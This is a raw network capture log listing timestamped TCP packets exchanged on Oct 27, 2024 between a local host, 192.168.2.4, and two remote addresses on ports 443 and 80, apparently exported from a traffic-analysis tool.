                                                                                                Oct 27, 2024 17:11:03.071139097 CET57720443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.071186066 CET4435772013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.071202040 CET57719443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.071214914 CET4435771913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.071238041 CET57720443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.071393013 CET57720443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.071408987 CET4435772013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.088917971 CET4435771813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.088973045 CET4435771813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.089083910 CET4435771813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.089147091 CET57718443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.089147091 CET57718443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.089183092 CET57718443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.089183092 CET57718443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.089200020 CET4435771813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.089210033 CET4435771813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.091383934 CET57721443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.091413021 CET4435772113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.091464043 CET57721443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.091646910 CET57721443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.091659069 CET4435772113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.099113941 CET4435771613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.099163055 CET4435771613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.099216938 CET57716443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.099231005 CET4435771613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.099270105 CET57716443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.099293947 CET57716443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.099298000 CET4435771613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.099308014 CET57716443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.099390984 CET4435771613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.099484921 CET4435771613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.101464987 CET57722443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.101490021 CET4435772213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.101536036 CET57722443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.101648092 CET57722443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.101661921 CET4435772213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.163094997 CET5771380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:03.163373947 CET5772380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:03.166682959 CET4435771513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.166759014 CET4435771513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.166825056 CET57715443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.166960955 CET57715443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.166999102 CET4435771513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.167028904 CET57715443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.167042971 CET4435771513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.169255972 CET57724443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.169289112 CET4435772413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.169368029 CET57724443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.169504881 CET57724443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.169522047 CET4435772413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.170701027 CET8057723152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.170764923 CET5772380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:03.170928955 CET5772380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:03.171273947 CET8057713152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.171328068 CET5771380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:03.178498983 CET8057723152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.815999985 CET4435771913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.816426992 CET57719443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.816447020 CET4435771913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.816853046 CET57719443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.816859961 CET4435771913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.839390039 CET4435772013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.839762926 CET57720443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.839839935 CET4435772013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.840164900 CET57720443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.840182066 CET4435772013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.849304914 CET4435772213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.849606991 CET57722443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.849639893 CET4435772213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.849978924 CET57722443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.849989891 CET4435772213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.878832102 CET4435772113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.879139900 CET57721443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.879162073 CET4435772113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.879529953 CET57721443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.879534006 CET4435772113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.901921988 CET4435772413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.902244091 CET57724443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.902323008 CET4435772413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.902615070 CET57724443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.902630091 CET4435772413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.949605942 CET4435771913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.949774981 CET4435771913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.949841976 CET57719443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.952110052 CET57719443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.952133894 CET4435771913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.952150106 CET57719443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.952157021 CET4435771913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.954586029 CET57725443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.954672098 CET4435772513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.954765081 CET57725443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.954878092 CET57725443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.954901934 CET4435772513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.974033117 CET4435772013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.974210978 CET4435772013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.974324942 CET57720443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.979424953 CET4435772213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.980288029 CET4435772213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.980355978 CET57722443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.987173080 CET57720443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.987215042 CET4435772013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.987256050 CET57720443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.987272978 CET4435772013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.987492085 CET57722443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.987492085 CET57722443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:03.987507105 CET4435772213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:03.987526894 CET4435772213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.023595095 CET4435772113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.024636984 CET4435772113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.024698019 CET57721443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.033276081 CET4435772413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.034055948 CET4435772413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.034116983 CET57724443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.050652027 CET57724443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.050702095 CET4435772413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.050749063 CET57724443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.050765038 CET4435772413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.052005053 CET57721443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.052028894 CET4435772113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.052040100 CET57721443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.052046061 CET4435772113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.054780960 CET57726443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.054836035 CET4435772613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.054917097 CET57726443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.055968046 CET57727443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.056050062 CET4435772713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.056118011 CET57727443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.057370901 CET57726443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.057399988 CET4435772613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.066764116 CET57728443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.066817999 CET4435772813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.066899061 CET57728443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.068958044 CET8057723152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.069020033 CET5772380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:04.103950024 CET57727443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.104020119 CET4435772713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.111229897 CET57728443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.111262083 CET4435772813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.153804064 CET57729443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.153829098 CET4435772913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.153917074 CET57729443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.160559893 CET57729443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.160569906 CET4435772913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.710287094 CET4435772513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.710841894 CET57725443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.710901976 CET4435772513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.711389065 CET57725443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.711441040 CET4435772513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.794239044 CET4435772613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.794572115 CET57726443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.794621944 CET4435772613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.794970989 CET57726443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.794997931 CET4435772613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.843863010 CET4435772513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.844024897 CET4435772513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.844094992 CET57725443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.844188929 CET57725443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.844233990 CET4435772513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.844263077 CET57725443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.844278097 CET4435772513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.846601963 CET57730443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.846687078 CET4435773013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.846755028 CET57730443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.846860886 CET57730443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.846880913 CET4435773013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.864393950 CET4435772713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.864676952 CET57727443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.864702940 CET4435772713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.865253925 CET57727443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.865264893 CET4435772713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.866389036 CET4435772813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.866672039 CET57728443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.866691113 CET4435772813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.867012978 CET57728443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.867022991 CET4435772813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.928369999 CET4435772613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.929209948 CET4435772613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.929276943 CET57726443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.953509092 CET57726443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.953509092 CET57726443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.953555107 CET4435772613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.953579903 CET4435772613.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.956027985 CET57731443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.956085920 CET4435773113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.956141949 CET57731443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.956285954 CET57731443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.956300974 CET4435773113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.994847059 CET4435772713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.995004892 CET4435772713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.995081902 CET57727443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.995153904 CET57727443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.995214939 CET4435772713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.995253086 CET57727443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.995269060 CET4435772713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.997370958 CET57732443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.997416019 CET4435773213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.997500896 CET57732443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.997623920 CET57732443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.997646093 CET4435773213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.998694897 CET4435772813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.998836994 CET4435772813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:04.998917103 CET57728443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.998917103 CET57728443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:04.998917103 CET57728443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.000653028 CET57733443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.000720024 CET4435773313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.000802040 CET57733443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.000899076 CET57733443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.000931978 CET4435773313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.117827892 CET4435772913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.118180990 CET57729443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.118196964 CET4435772913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.118602037 CET57729443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.118606091 CET4435772913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.250576019 CET4435772913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.250724077 CET4435772913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.250782967 CET57729443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.250802994 CET57729443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.250813007 CET4435772913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.250824928 CET57729443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.250828981 CET4435772913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.252648115 CET57734443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.252686977 CET4435773413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.252757072 CET57734443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.252861977 CET57734443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.252887964 CET4435773413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.303392887 CET57728443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.303447962 CET4435772813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.582726002 CET4435773013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.585721016 CET57730443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.585755110 CET4435773013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.586100101 CET57730443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.586131096 CET4435773013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.689493895 CET4435773113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.690342903 CET57731443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.690363884 CET4435773113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.690752983 CET57731443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.690758944 CET4435773113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.715111971 CET4435773013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.715274096 CET4435773013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.715449095 CET57730443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.715615988 CET57730443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.715648890 CET4435773013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.715696096 CET57730443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.715711117 CET4435773013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.718036890 CET57735443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.718127012 CET4435773513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.718220949 CET57735443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.718348980 CET57735443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.718372107 CET4435773513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.725488901 CET4435773213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.725824118 CET57732443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.725851059 CET4435773213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.726213932 CET57732443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.726224899 CET4435773213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.740979910 CET4435773313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.741349936 CET57733443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.741410017 CET4435773313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.741738081 CET57733443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.741751909 CET4435773313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.772480011 CET5772380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:05.772825003 CET5773680192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:05.780930042 CET8057723152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.781001091 CET5772380192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:05.781078100 CET8057736152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.781147003 CET5773680192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:05.781279087 CET5773680192.168.2.4152.89.198.124
                                                                                                Oct 27, 2024 17:11:05.789252996 CET8057736152.89.198.124192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.819582939 CET4435773113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.819737911 CET4435773113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.819788933 CET57731443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.819811106 CET57731443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.819823027 CET4435773113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.819832087 CET57731443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.819835901 CET4435773113.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.821670055 CET57737443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.821753025 CET4435773713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.821831942 CET57737443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.821933985 CET57737443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.821969032 CET4435773713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.857781887 CET4435773213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.857924938 CET4435773213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.857999086 CET57732443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.858163118 CET57732443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.858163118 CET57732443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.858181953 CET4435773213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.858203888 CET4435773213.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.860465050 CET57738443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.860551119 CET4435773813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.860626936 CET57738443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.860724926 CET57738443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.860757113 CET4435773813.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.871649027 CET4435773313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.871865034 CET4435773313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.871949911 CET57733443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.872112989 CET57733443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.872112989 CET57733443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.872155905 CET4435773313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.872181892 CET4435773313.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.873652935 CET57739443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.873694897 CET4435773913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.873769045 CET57739443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.873867035 CET57739443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.873898029 CET4435773913.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.982244968 CET4435773413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.982639074 CET57734443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.982671022 CET4435773413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:05.983123064 CET57734443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:05.983133078 CET4435773413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:06.110589981 CET4435773413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:06.110901117 CET4435773413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:06.110969067 CET57734443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:06.111042976 CET57734443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:06.111042976 CET57734443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:06.111068010 CET4435773413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:06.111088037 CET4435773413.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:06.113960028 CET57740443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:06.114063978 CET4435774013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:06.114154100 CET57740443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:06.114310026 CET57740443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:06.114346027 CET4435774013.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:06.493429899 CET4435773513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:06.493895054 CET57735443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:06.493963957 CET4435773513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:06.494687080 CET57735443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:06.494699955 CET4435773513.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:06.546080112 CET4435773713.107.246.51192.168.2.4
                                                                                                Oct 27, 2024 17:11:06.599772930 CET57737443192.168.2.413.107.246.51
                                                                                                Oct 27, 2024 17:11:06.599832058 CET4435773713.107.246.51192.168.2.4
